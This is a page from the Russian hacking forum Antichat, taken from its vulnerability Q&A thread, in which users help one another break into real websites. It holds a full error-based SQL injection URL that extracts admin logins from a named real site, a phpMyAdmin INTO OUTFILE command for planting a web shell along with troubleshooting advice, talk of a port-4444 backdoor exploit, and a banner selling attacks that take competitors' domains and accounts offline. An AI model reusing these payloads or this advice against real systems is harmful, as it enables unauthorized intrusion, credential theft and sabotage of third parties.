Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1714 из 2422

1714

Опции темы

Поиск в этой теме

Опции просмотра

28.06.2011, 18:43

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

С нами: 9061916

Репутация: 0

Цитата:

Сообщение от qaz

убрал, тотже ифект

вывода и не будет, потому что это блайнд. в данном случае можно добиться вывода в ошибке. раскрутил по методу qwazar'a :

Код HTML:

http://jetterauto.ru/index/page/id/411+and+1=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cms_user_list.login,0x27,0x7e)+from+mainfra_jetter_tst.cms_user_list+order+by+login+limit+0,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1

𝕏 Twitter Reddit Telegram Копировать ссылку

28.06.2011, 19:46

plaeer

Участник форума

Регистрация: 08.03.2011

Сообщений: 149

С нами: 7990166

Репутация: 1

Цитата:

Сообщение от plaeer

Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...

Что никто не может помочь?

28.06.2011, 20:31

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Цитата:

Сообщение от plaeer

Что никто не может помочь?

Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.

28.06.2011, 21:37

plaeer

Участник форума

Регистрация: 08.03.2011

Сообщений: 149

С нами: 7990166

Репутация: 1

Цитата:

Сообщение от R0nin

Вообще-то эту уязвимость обнаружил сканер.

28.06.2011, 21:38

plaeer

Участник форума

Регистрация: 08.03.2011

Сообщений: 149

С нами: 7990166

Репутация: 1

Сам сплоит - http://www.securitylab.ru/poc/391481.php

28.06.2011, 22:25

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Цитата:

Сообщение от plaeer

Сам сплоит - http://www.securitylab.ru/poc/391481.php

Сканер может ошибится.

ПО может иметь уязвимую версию но при этом таки может быть пропатченным.

28.06.2011, 22:32

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

С нами: 8772211

Репутация: 56

Цитата:

Сообщение от plaeer

Вообще-то эту уязвимость обнаружил сканер.

Ну раз сканер, тогда это координально меняет ситуацию

29.06.2011, 13:28

GroM88

Познающий

Регистрация: 25.10.2007

Сообщений: 46

С нами: 9761387

Репутация: 2

Траблы с залитием шела через phpmyadmin

File_priv : Y

Делаю запрос :

SELECT '' into OUTFILE '/var/www/html/web/site.com/shell.php'

Мне в ответ:

#1 - Can't create/write to file '/var/www/html/web/site.com/shell.php' (Errcode: 13)

Почему вылазит такая ошибка и файл не создается?

29.06.2011, 13:30

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

С нами: 9642449

Репутация: 606

Прав нет же

На запись в папку.

#10

29.06.2011, 20:19

Sc0rpi0n

Новичок

Регистрация: 23.02.2010

Сообщений: 3

С нами: 8534431

Репутация: 76

Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.

там чёто типа floor rand. токо не могу найти мануал...

Страница 1714 из 2422

1714

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57